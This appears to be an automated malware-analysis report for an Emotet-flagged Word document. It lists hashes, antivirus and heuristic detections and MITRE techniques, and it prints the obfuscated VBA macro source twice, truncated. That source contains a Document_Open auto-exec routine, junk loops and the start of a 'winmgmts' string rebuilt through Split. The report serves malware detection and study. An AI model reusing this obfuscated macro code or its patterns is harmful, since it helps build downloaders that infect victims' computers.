Emotet Office (OLE) malware analysis — malicious · 99e567b65413467c

MALICIOUS

Office (OLE)

182.5 KB Created: 2019-12-20 17:07:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: e5fbb4bfb9babd60fb9c082fb69c1afc SHA-1: a2c281cdf0000e673d9fdb3801d24e4e55e4681e SHA-256: 99e567b65413467cd68e866366bcd22e1245a74078213fb4a5b21e4b1dbaffde

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for Emotet. The macro's structure suggests it is designed to execute code upon opening the document. ClamAV detection also explicitly identifies it as an Emotet downloader. No specific URLs or executable payloads were directly extracted, but the presence of the macro and its execution trigger are strong indicators of malicious intent.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7473497-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7473497-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7618 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7618 bytes
SHA-256: `4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Aojplemq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox" Private Sub Document_open() Ltyncvvwo = 234 + 423 Do While Cikubwvivihv = 1 Hcmhzkjwdl = 3 * Fqdsyasenoww Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.") For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh Bnbajuowvggcm = ("Rerum ad nihil vel.") Gingzqsy = 223 Next Uuavxkoiio = Elfrlfbvs Loop Ewxdqdei Ewdbqeofwfve = 234 + 423 Do While Ucwjhgwmvyh = 1 Rdkgxjky = 3 * Hscfaewhrzd Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.") For Lzxvhrtl = Favhzrpsxom To Trngalouzizs Wrljfjwzrb = ("Velit saepe.") Ndffipzh = 223 Next Ulszawfr = Chtalegcvuz Loop End Sub Attribute VB_Name = "Jeuwzqvsdrcqz" Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Rgzhzedt" Function Ypzdgmswtvdol() Ecpsjpwmt = 234 + 423 Do While Iflpcowzdtqob = 1 Qlrgusoolmu = 3 * Evuphzdzzkfb Mnnnndwy = ("Et.") For Nqguqadhjbui = Gckorame To Bbxyhbyfjab Jiygysjieomg = ("Enim ut vel.") Hhkijhrspcfz = 223 Next Oyzzpjbf = Nlzgxmlswiqx Loop Ccahqiqatqpii = Aojplemq.Gzuokbkyuug Xoxcfslhh = 234 + 423 Do While Pkocrnurft = 1 Kkoupcjxomswo = 3 * Llcoewtryqjb Bqljpnrrywfxb = ("Autem.") For Sroysigd = Cqtqegapan To Nyfcungih Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.") Upfiaghl = 223 Next Tqotxwchqfk = Xomriamlhe Loop Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu Zcyuqbzhudyk = 234 + 423 Do While Wvxzhtphlfoe = 1 Ibunrqdbman = 3 * Aoxboyme Vjpfsrtgmsmz = ("In tempora dolor aut amet.") For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.") Jkgqadlqc = 223 Next Xmwymfrzzqoo = Skfbpvqn Loop Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag Lhsyghafslbi = 234 + 423 Do While Letzvixom = 1 Xdgyuyaelpj = 3 * Hgrkaaarl Gdjeewwuxkid = ("Ea et.") For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz Uphpromjiicnw = ("Magnam.") Pgxecxxnq = 223 Next Ntkkyuimxzkb = Ofkffhbrs Loop Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq Yyqtlblmjar = 234 + 423 Do While Usazcqclwva = 1 Bvovtqeuu = 3 * Dwiiuaeoe Iihvwfbbcqq = ("Quaerat id voluptates quis est.") For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup Plpplkfme = ("Dicta.") Pcryihkdhla = 223 Next Zavjsxectfr = Enincmvatq Loop End Function Function Ewxdqdei() Hhahpldlmgytv = 234 + 423 Do While Bdbvsqpntmg = 1 Cpsroosgidlmw = 3 * Nxrrvfnk Iisthuiee = ("Larry") For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk Ujcwmygukzttl = ("Ronnie") Puyciwrsobfm = 223 Next Gifyxuvw = Gurqiiogepkv Loop iwiwiiwiwjjsj = "__&888&^bBGks^@" Dxztlkebm = 234 + 423 Do While Ngqkvsvdtavag = 1 Mvopoxnzbmda = 3 Vpwvlvkkk Xiaghwsmsyin = ("Sint hic officiis vel.") For Bagoxrskw = Yfumibldur To Ttpkosinbao Evmtdnmdvjry = ("Et.") Wwjcpnmnvh = 223 Next Rojjyrkr = Zjqecjxky Loop Uqdvmpngkfcs = Split("__&888&^bBGks^@wi__&888&^bBGks^@nmg__&888&^b" + "BGks^@mts__&888&^b ... (truncated)

SHA-256: 4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Aojplemq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Ltyncvvwo = 234 + 423
   Do While Cikubwvivihv = 1
      Hcmhzkjwdl = 3 * Fqdsyasenoww
      Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
      For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
         Bnbajuowvggcm = ("Rerum ad nihil vel.")
         Gingzqsy = 223
      Next
      Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
   Ewdbqeofwfve = 234 + 423
   Do While Ucwjhgwmvyh = 1
      Rdkgxjky = 3 * Hscfaewhrzd
      Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
      For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
         Wrljfjwzrb = ("Velit saepe.")
         Ndffipzh = 223
      Next
      Ulszawfr = Chtalegcvuz
Loop
End Sub

Attribute VB_Name = "Jeuwzqvsdrcqz"
Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rgzhzedt"
Function Ypzdgmswtvdol()
   Ecpsjpwmt = 234 + 423
   Do While Iflpcowzdtqob = 1
      Qlrgusoolmu = 3 * Evuphzdzzkfb
      Mnnnndwy = ("Et.")
      For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
         Jiygysjieomg = ("Enim ut vel.")
         Hhkijhrspcfz = 223
      Next
      Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
   Xoxcfslhh = 234 + 423
   Do While Pkocrnurft = 1
      Kkoupcjxomswo = 3 * Llcoewtryqjb
      Bqljpnrrywfxb = ("Autem.")
      For Sroysigd = Cqtqegapan To Nyfcungih
         Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
         Upfiaghl = 223
      Next
      Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
   Zcyuqbzhudyk = 234 + 423
   Do While Wvxzhtphlfoe = 1
      Ibunrqdbman = 3 * Aoxboyme
      Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
      For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
         Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
         Jkgqadlqc = 223
      Next
      Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
   Lhsyghafslbi = 234 + 423
   Do While Letzvixom = 1
      Xdgyuyaelpj = 3 * Hgrkaaarl
      Gdjeewwuxkid = ("Ea et.")
      For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
         Uphpromjiicnw = ("Magnam.")
         Pgxecxxnq = 223
      Next
      Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
   Yyqtlblmjar = 234 + 423
   Do While Usazcqclwva = 1
      Bvovtqeuu = 3 * Dwiiuaeoe
      Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
      For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
         Plpplkfme = ("Dicta.")
         Pcryihkdhla = 223
      Next
      Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
   Hhahpldlmgytv = 234 + 423
   Do While Bdbvsqpntmg = 1
      Cpsroosgidlmw = 3 * Nxrrvfnk
      Iisthuiee = ("Larry")
      For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
         Ujcwmygukzttl = ("Ronnie")
         Puyciwrsobfm = 223
      Next
      Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Dxztlkebm = 234 + 423
   Do While Ngqkvsvdtavag = 1
      Mvopoxnzbmda = 3 * Vpwvlvkkk
      Xiaghwsmsyin = ("Sint hic officiis vel.")
      For Bagoxrskw = Yfumibldur To Ttpkosinbao
         Evmtdnmdvjry = ("Et.")
         Wwjcpnmnvh = 223
      Next
      Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^b
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.